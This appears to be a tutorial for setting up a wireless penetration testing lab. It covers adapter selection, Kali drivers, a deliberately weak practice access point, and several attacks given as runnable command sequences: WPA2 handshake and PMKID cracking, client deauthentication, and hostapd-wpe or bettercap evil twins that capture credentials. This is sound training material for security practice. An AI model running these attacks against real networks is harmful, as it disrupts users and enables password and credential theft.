⚡ Intermediate
Wireless Testing Lab Setup
Set up a dedicated wireless security testing environment with the right hardware, drivers, and practice access points. Practice WPA2/WPA3 cracking, evil twin attacks, and wireless reconnaissance in a controlled setting.
Legal Warning
Only test wireless networks you own or have explicit written authorization to test.
Unauthorized wireless interception is illegal in most jurisdictions. Always use an
isolated lab environment.
Recommended Wireless Adapters
Not all WiFi adapters support monitor mode and packet injection. These adapters are tested and recommended for penetration testing:
| Adapter | Chipset | Bands | Monitor Mode | Best For |
|---|---|---|---|---|
| Alfa AWUS036AXML | MediaTek MT7921AU | 2.4/5/6 GHz (WiFi 6E) | ✓ | Modern WiFi 6E testing |
| Alfa AWUS036ACH | Realtek RTL8812AU | 2.4/5 GHz (AC) | ✓ | Dual-band, strong range |
| Alfa AWUS036ACM | MediaTek MT7612U | 2.4/5 GHz (AC) | ✓ | Best Linux support, reliable |
| Panda PAU09 | Ralink RT5572 | 2.4/5 GHz (N) | ✓ | Budget option, plug & play |
| TP-Link TL-WN722N v1 | Atheros AR9271 | 2.4 GHz (N) | ✓ | Classic beginner choice (v1 only) |
Version Matters
Many adapters change chipsets between hardware revisions. The TP-Link TL-WN722N v1 uses
Atheros AR9271 (great for pentesting), but v2/v3 use Realtek chips that don't support
monitor mode without patched drivers. Always verify the chipset before purchasing.
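Once an adapter is attached, its advertised capabilities can be checked directly rather than inferred from the model name. The script below is an added example, not part of the original guide: it summarises `iw list` output per radio (monitor-mode support and bands seen). The helper names `adapter_caps` and `sample_iw_list` are hypothetical, and the sample input is constructed.

```shell
#!/bin/sh
# Added example: summarise `iw list` output per radio (monitor mode + bands).

adapter_caps() {
  awk '
    function flush() {
      if (phy != "")
        printf "%s monitor=%s bands=%s\n", phy, (mon ? "yes" : "no"), (bands == "" ? "none" : bands)
    }
    # A new radio starts: emit the previous one and reset state.
    /^Wiphy / { flush(); phy = $2; mon = 0; bands = ""; in_modes = 0; split("", seen); next }
    /Supported interface modes:/ { in_modes = 1; next }
    # Inside the modes list every entry is "* <mode>".
    in_modes && /^[ \t]*\* / { if ($2 == "monitor") mon = 1; next }
    in_modes { in_modes = 0 }
    # Frequency entries look like "* 2412 MHz [1] (20.0 dBm)"; skip disabled channels.
    /^[ \t]*\* [0-9.]+ MHz/ && !/disabled/ {
      f = $2 + 0
      b = (f < 3000) ? "2.4" : ((f < 5925) ? "5" : "6")
      if (!(b in seen)) { seen[b] = 1; bands = bands (bands == "" ? "" : ",") b }
    }
    END { flush() }
  '
}

# Constructed sample input (abridged `iw list` layout), not captured from real hardware.
sample_iw_list() {
  cat <<'EOF'
Wiphy phy0
    Supported interface modes:
         * managed
         * AP
         * monitor
    Band 1:
        Frequencies:
            * 2412 MHz [1] (20.0 dBm)
            * 2437 MHz [6] (20.0 dBm)
    Band 2:
        Frequencies:
            * 5180 MHz [36] (20.0 dBm)
            * 5260 MHz [52] (disabled)
Wiphy phy1
    Supported interface modes:
         * managed
         * AP
EOF
}

sample_iw_list | adapter_caps   # on a real host: iw list | adapter_caps
```

A radio that reports `monitor=no` here is one of the revisions that needs a different driver or a different adapter.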
Driver Setup on Kali
```bash
# Most Alfa adapters work out of the box on Kali
# Update and install wireless tools
sudo apt update && sudo apt install -y \
  aircrack-ng \
  hcxdumptool \
  hcxtools \
  hostapd-wpe \
  bettercap \
  wifite \
  mdk4 \
  pixiewps \
  reaver

# For RTL8812AU chipset (AWUS036ACH) - if not auto-detected
sudo apt install -y realtek-rtl88xxau-dkms

# For MT7921AU chipset (AWUS036AXML / WiFi 6E)
# Requires kernel 5.18+ (Kali 2023.1+)
# Check if kernel supports it:
modinfo mt7921u

# Verify adapter is detected
iwconfig
# Or
iw dev

# Check chipset info
lsusb | grep -i wireless
airmon-ng
```
USB Passthrough for VMs
If running Kali in a VM, you must pass the USB WiFi adapter through to the guest.
VMware
- VM → Removable Devices → Select adapter
- Click "Connect" to pass through
- Or: VM Settings → USB Controller → Add USB device
- Verify with `lsusb` in Kali
VirtualBox
- Install VirtualBox Extension Pack
- Settings → USB → Enable USB 3.0
- Add USB device filter for adapter
- Start VM — adapter auto-attaches
Practice Access Point Setup
Create your own vulnerable access point for testing. Use a second WiFi adapter or a cheap router with OpenWrt for the target AP.
```bash
# Install hostapd
sudo apt install -y hostapd dnsmasq

# Create hostapd config for WPA2 AP
# (hostapd only treats lines that start with '#' as comments, so comments
# must not share a line with a setting)
cat > /tmp/hostapd.conf << 'EOF'
# Use second adapter for AP
interface=wlan1
driver=nl80211
ssid=PentestLab_AP
channel=6
hw_mode=g
ieee80211n=1
# WPA2 with weak password (for cracking practice)
wpa=2
wpa_passphrase=password123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF

# Start the access point
sudo hostapd /tmp/hostapd.conf

# In another terminal, set up DHCP for clients
cat > /tmp/dnsmasq.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.100.10,192.168.100.50,12h
server=8.8.8.8
EOF
sudo ifconfig wlan1 192.168.100.1 netmask 255.255.255.0
sudo dnsmasq -C /tmp/dnsmasq.conf
```
WPA2 Cracking Exercise
```bash
# Step 1: Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Step 2: Scan for target AP
sudo airodump-ng wlan0mon

# Step 3: Capture handshake from target AP
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Step 4: Deauth a client to force re-authentication (in new terminal)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Wait for "WPA handshake" in airodump output

# Step 5: Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Alternative: Use hashcat for GPU acceleration
# Convert capture to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap
# Crack with hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
```
Modern Attacks: PMKID & WPA3
```bash
# PMKID attack doesn't require deauthing any clients
# Use hcxdumptool to capture PMKID

# Capture PMKID from target AP
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2

# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Crack with hashcat
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt
```
WPA3 Testing
WPA3-SAE is resistant to offline dictionary attacks, but transition mode (WPA2/WPA3 mixed)
may still be vulnerable to downgrade attacks. Use Dragonblood tools to test
WPA3-SAE implementations. Note: WPA3 testing requires adapters supporting SAE (WiFi 6/6E adapters).
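The difference between WPA2-PSK, transition mode, and SAE-only comes down to two hostapd settings, `wpa_key_mgmt` and `ieee80211w`. The script below is an added example, not part of the original guide: it classifies a lab AP's hostapd settings and reports the exposure each mode leaves. The function names and the abridged sample configs are constructed for illustration.

```shell
#!/bin/sh
# Added example: classify hostapd settings by key management and PMF (ieee80211w).

conf_get() {  # conf_get KEY: value of the last uncommented KEY= line in $conf
  printf '%s\n' "$conf" | sed -n "s/^$1=//p" | tail -n 1
}

has_akm() { case " $akm " in *" $1 "*) return 0 ;; *) return 1 ;; esac; }

audit_hostapd_conf() {  # reads a hostapd.conf on stdin
  conf=$(cat)
  akm=$(conf_get wpa_key_mgmt)
  case "$(conf_get ieee80211w)" in
    2) pmf=required ;; 1) pmf=optional ;; *) pmf=disabled ;;
  esac
  if has_akm SAE && has_akm WPA-PSK; then mode=transition
  elif has_akm SAE; then mode=wpa3-sae
  elif has_akm WPA-PSK; then mode=wpa2-psk
  else mode=other; fi
  echo "mode=$mode pmf=$pmf"
  case "$mode" in
    wpa2-psk)   echo "finding: captured handshake or PMKID can be attacked offline" ;;
    transition) echo "finding: WPA2-PSK is still accepted next to SAE (downgrade exposure)" ;;
    wpa3-sae)   [ "$pmf" = required ] || echo "finding: SAE-only AP should set ieee80211w=2" ;;
  esac
}

# Constructed, abridged sample configs (only the lines the audit reads matter).
sample_wpa2() { printf '%s\n' 'ssid=PentestLab_AP' 'wpa=2' 'wpa_key_mgmt=WPA-PSK' \
  'wpa_passphrase=password123' 'rsn_pairwise=CCMP'; }
sample_transition() { printf '%s\n' 'ssid=PentestLab_AP' 'wpa=2' 'wpa_key_mgmt=WPA-PSK SAE' \
  'ieee80211w=1' 'rsn_pairwise=CCMP'; }
sample_wpa3() { printf '%s\n' 'ssid=PentestLab_AP' 'wpa=2' 'wpa_key_mgmt=SAE' \
  'ieee80211w=2' 'rsn_pairwise=CCMP'; }

for s in sample_wpa2 sample_transition sample_wpa3; do
  echo "== $s"; "$s" | audit_hostapd_conf
done
```

Against a real lab AP, run it as `audit_hostapd_conf < /tmp/hostapd.conf`; only the SAE-only config with required PMF comes back without a finding.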
Evil Twin Attack Lab
```bash
# hostapd-wpe creates a rogue AP for credential capture
# Useful for WPA-Enterprise (802.1X) attacks

# Configure hostapd-wpe
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
# Set: ssid=CorpWiFi (match target SSID)
# Set: interface=wlan0
# Set: channel=6

# Start evil twin
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# Captured credentials appear in the terminal
# MSCHAPV2 hashes can be cracked with asleap or hashcat

# Alternative: Use bettercap for automated evil twin
sudo bettercap -iface wlan0mon
# In bettercap:
# > wifi.recon on
# > wifi.deauth AA:BB:CC:DD:EE:FF
# > wifi.ap
```
Troubleshooting FAQ
Adapter not detected in Kali VM
- Ensure USB passthrough is enabled (see VM setup section above)
- Check `lsusb` — adapter should appear in the list
- Try a different USB port (USB 2.0 vs 3.0 can matter)
- Install VirtualBox Extension Pack for USB 3.0 support
- Reboot the VM after connecting the adapter
Monitor mode fails or "device busy"
- Kill interfering processes first: `sudo airmon-ng check kill`
- Disable NetworkManager for wifi: `sudo systemctl stop NetworkManager`
- Try manual mode: `sudo ip link set wlan0 down && sudo iw dev wlan0 set type monitor && sudo ip link set wlan0 up`
- Some chipsets need patched drivers — check the adapter's GitHub issues
No handshake captured after deauth
- Ensure you're on the correct channel — match the target AP's channel
- Get closer to the AP and client for better signal
- Try targeting specific clients: `aireplay-ng -0 5 -a AP_BSSID -c CLIENT_MAC wlan0mon`
- Some clients don't auto-reconnect — try multiple deauths with pauses
- Use PMKID attack instead (doesn't need active clients)
5 GHz networks not showing up
- Verify adapter supports 5 GHz: `iw phy | grep -A 20 "Frequencies"`
- Scan both bands: `sudo airodump-ng --band abg wlan0mon`
- Regulatory domain may limit channels: `sudo iw reg set US`
- Some 2.4 GHz-only adapters (like TL-WN722N) won't see 5 GHz networks